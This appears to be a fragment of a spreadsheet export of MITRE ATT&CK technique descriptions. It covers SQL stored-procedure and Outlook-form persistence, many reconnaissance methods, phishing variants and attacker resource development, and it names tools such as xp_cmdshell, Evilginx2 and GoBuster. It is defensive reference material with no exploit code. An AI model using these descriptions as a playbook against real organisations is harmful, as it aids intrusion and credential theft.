Adversaries may craft malicious stored procedures that can provide a persistence mechanism in SQL database servers.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019) To execute operating system commands through SQL syntax the adversary may have to enable additional functionality, such as xp_cmdshell for MSSQL Server.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019)(Citation: Microsoft xp_cmdshell 2017) 
Microsoft SQL Server can enable common language runtime (CLR) integration. With CLR integration enabled, application developers can write stored procedures using any .NET framework language (e.g. VB .NET, C#, etc.).(Citation: Microsoft CLR Integration 2017) Adversaries may craft or modify CLR assemblies that are linked to stored procedures since these CLR assemblies can be made to execute arbitrary commands.(Citation: NetSPI SQL Server CLR) </t>
  </si>
  <si>
    <t>Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
Once malicious forms have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious forms will execute when an adversary sends a specifically crafted email to the user.(Citation: SensePost Outlook Forms)</t>
  </si>
  <si>
    <t>Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
Adversaries may search in different social media sites depending on what information they seek to gather. Threat actors may passively harvest data from these sites, as well as use information gathered to create fake profiles/groups to elicit victim’s into revealing specific information (i.e. [Spearphishing Service](https://attack.mitre.org/techniques/T1598/001)).(Citation: Cyware Social Media)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[Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).</t>
  </si>
  <si>
    <t>Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
Adversaries may craft various search engine queries depending on what information they seek to gather. Threat actors may use search engines to harvest general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive information such as network details or credentials.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[Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may search public code repositories for information about victims that can be used during targeting. Victims may store code in repositories on various third-party websites such as GitHub, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.  
Adversaries may search various public code repositories for various information about a victim. Public code repositories can often be a source of various general information about victims, such as commonly used programming languages and libraries as well as the names of employees. Adversaries may also identify more sensitive data, including accidentally leaked credentials or API keys.(Citation: GitHub Cloud Service Credentials) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)). 
**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1213/003), which focuses on [Collection](https://attack.mitre.org/tactics/TA0009) from private and internally hosted code repositories. </t>
  </si>
  <si>
    <t>Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
Adversaries may search WHOIS data to gather actionable information. Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)),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</si>
  <si>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Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
Adversaries may search scan databases to gather actionable information. Threat actors can use online resources and lookup tools to harvest information from these services. Adversaries may seek information about their already identified targets, or use these datasets to discover opportunities for successful breaches. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595)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t>
  </si>
  <si>
    <t>Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
Adversaries may search digital certificate data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about certificates.(Citation: SSLShopper Lookup) Digital certificate data may also be available from artifacts signed by the organization (ex: certificates used from encrypted web traffic are served with content).(Citation: Medium SSL Cert) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).</t>
  </si>
  <si>
    <t>Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
Adversaries may search CDN data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about content servers within a CDN. Adversaries may also seek and target CDN misconfigurations that leak sensitive information not intended to be hosted and/or do not have the same protection mechanisms (ex: login portals) as the content hosted on the organization’s website.(Citation: DigitalShadows CDN) Information from these sources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[Drive-by Compromise](https://attack.mitre.org/techniques/T1189)).</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may iteratively probe infrastructure using brute-forcing and crawling techniques. While this technique employs similar methods to [Brute Force](https://attack.mitre.org/techniques/T1110), its goal is the identification of content and infrastructure rather than the discovery of valid credentials. Wordlists used in these scans may contain generic, commonly used names and file extensions or terms specific to a particular software. Adversaries may also create custom, target-specific wordlists using data gathered from other Reconnaissance techniques (ex: [Gather Victim Org Information](https://attack.mitre.org/techniques/T1591), or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).
For example, adversaries may use web content discovery tools such as Dirb, DirBuster, and GoBuster and generic or custom wordlists to enumerate a website’s pages and directories.(Citation: ClearSky Lebanese Cedar Jan 2021) This can help them to discover old, vulnerable pages or hidden administrative portals that could become the target of further operations (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [Brute Force](https://attack.mitre.org/techniques/T1110)).  
As cloud storage solutions typically use globally unique names, adversaries may also use target-specific wordlists and tools such as s3recon and GCPBucketBrute to enumerate public and private buckets on cloud infrastructure.(Citation: S3Recon GitHub)(Citation: GCPBucketBrute) Once storage objects are discovered, adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530) to access valuable information that can be exfiltrated or used to escalate privileges and move laterally. </t>
  </si>
  <si>
    <t>Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
Adversaries may search in private threat intelligence vendor data to gather actionable information. Threat actors may seek information/indicators gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns. Information reported by vendors may also reveal opportunities other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
Adversaries may purchase information about their already identified targets, or use purchased data to discover opportunities for successful breaches. Threat actors may gather various technical details from purchased data, including but not limited to employee contact information, credentials, or specifics regarding a victim’s infrastructure.(Citation: ZDNET Selling Data)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t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about host firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).(Citation: ArsTechnica Intel)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[Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).</t>
  </si>
  <si>
    <t>Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
These scans may also include more broad attempts to [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592) that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning)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[Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.
Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then add malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets. Finally, where multi-factor authentication (MFA) based on out-of-band communications is in use, adversaries may compromise a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)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[External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). </t>
  </si>
  <si>
    <t>Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
Adversaries may search DNS data to gather actionable information. Threat actors can query nameservers for a target organization directly, or search through centralized repositories of logged DNS query responses (known as passive DNS).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Adversaries may also seek and target DNS misconfigurations/leaks that reveal information about internal networks. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)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</si>
  <si>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Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.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client configurations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t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: Pentesting AD Forests)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</si>
  <si>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Adversaries may send spearphishing messages via third-party services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send messages through various social media services, personal webmail, and other non-enterprise controlled services.(Citation: ThreatPost Social Media Phishing) These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries may create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and information about their environment. Adversaries may also use information from previous reconnaissance efforts (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Where third-party cloud providers are in use, this information may also be exposed through publicly available API endpoints, such as GetUserRealm and autodiscover in Office 365 environments.(Citation: Azure Active Directory Reconnaisance)(Citation: Office 265 Azure Domain Availability) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about assigned IP addresses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t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598).(Citation: Nmap Firewalls NIDS) Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)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t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: DNS Dumpster) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)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t>
  </si>
  <si>
    <t>Adversaries may send spearphishing messages with a malicious link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the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may be a clone of a legitimate site (such as an online or corporate login portal) or may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, `hxxp://google.com@1157586937`.(Citation: Mandiant URL Obfuscation 2023)
Adversaries may also link to "web bugs" or "web beacons" within phishing messages to verify the receipt of an email, while also potentially profiling and tracking victim information such as IP address.(Citation: NIST Web Bug)
Adversaries may also be able to spoof a complete website using what is known as a "browser-in-the-browser" (BitB) attack. By generating a fake browser popup window with an HTML-based address bar that appears to contain a legitimate URL (such as an authentication portal), they may be able to prompt users to enter their credentials while bypassing typical URL verification methods.(Citation: ZScaler BitB 2020)(Citation: Mr. D0x BitB 2022)
Adversaries can use phishing kits such as `EvilProxy` and `Evilginx2` to proxy the connection between the victim and the legitimate website. On a successful login, the victim is redirected to the legitimate website, while the adversary captures their session cookie (i.e., [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)) in addition to their username and password. This may enable the adversary to then bypass MFA via [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004).(Citation: Proofpoint Human Factor)
From the fake website, information is gathered in web forms and sent to the adversary. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.</t>
  </si>
  <si>
    <t>Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Social Media](https://attack.mitre.org/techniques/T1593/001)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information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[Phishing](https://attack.mitre.org/techniques/T1566) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business tempo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or [Trusted Relationship](https://attack.mitre.org/techniques/T1199))</t>
  </si>
  <si>
    <t>Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business roles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t>
  </si>
  <si>
    <t>Adversaries may send spearphishing messages with a malicious attachment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attach a file to the spearphishing email and usually rely upon the recipient populating information then returning the file.(Citation: Sophos Attachment)(Citation: GitHub Phishery) The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).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installed software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for initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees.
Adversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Email addresses could also be enumerated via more active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)), such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.(Citation: GrimBlog UsernameEnum) For example, adversaries may be able to enumerate email addresses in Office 365 environments by querying a variety of publicly available API endpoints, such as autodiscover and GetCredentialType.(Citation: GitHub Office 365 User Enumeration)(Citation: Azure Active Directory Reconnaisance)
Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Brute Force](https://attack.mitre.org/techniques/T1110) via [External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
Adversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)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t>
  </si>
  <si>
    <t>Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
Adversaries may scan IP blocks in order to [Gather Victim Network Information](https://attack.mitre.org/techniques/T1590), such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more nuanced scans that may reveal host software/versions via server banners or other network artifacts.(Citation: Botnet Scan)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t>
  </si>
  <si>
    <t>Adversaries may use voice communications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[Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
All forms of phishing are electronically delivered social engineering. In this scenario, adversaries use phone calls to elicit sensitive information from victims. Known as voice phishing (or "vishing"), these communications can be manually executed by adversaries, hired call centers, or even automated via robocalls. Voice phishers may spoof their phone number while also posing as a trusted entity, such as a business partner or technical support staff.(Citation: BOA Telephone Scams)
Victims may also receive phishing messages that direct them to call a phone number ("callback phishing") where the adversary attempts to collect confidential information.(Citation: Avertium callback phishing)
Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to tailor pretexts to be even more persuasive and believable for the victim.</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business relationships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[Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: hostnames, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the hardware infrastructure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[Compromise Hardware Supply Chain](https://attack.mitre.org/techniques/T1195/003) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).</t>
  </si>
  <si>
    <t>Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).</t>
  </si>
  <si>
    <t>Adversaries may buy and/or steal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Adversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise) Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.
Certificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ)
After obtaining a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.</t>
  </si>
  <si>
    <t>Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
By running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic ([DNS](https://attack.mitre.org/techniques/T1071/004)). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.(Citation: Unit42 DNS Mar 2019)</t>
  </si>
  <si>
    <t>Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).(Citation: Imperva DDoS for Hire)(Citation: Krebs-Anna)(Citation: Krebs-Bazaar)(Citation: Krebs-Booter)</t>
  </si>
  <si>
    <t>Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001)), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. 
A variety of methods exist for compromising social media accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising social media accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.
Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Compromised social media accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.
Adversaries can use a compromised social media profile to create new, or hijack existing, connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) Compromised profiles may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).</t>
  </si>
  <si>
    <t>Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser service, adversaries may build their own botnet by compromising numerous third-party systems.(Citation: Imperva DDoS for Hire) Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).</t>
  </si>
  <si>
    <t>Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.
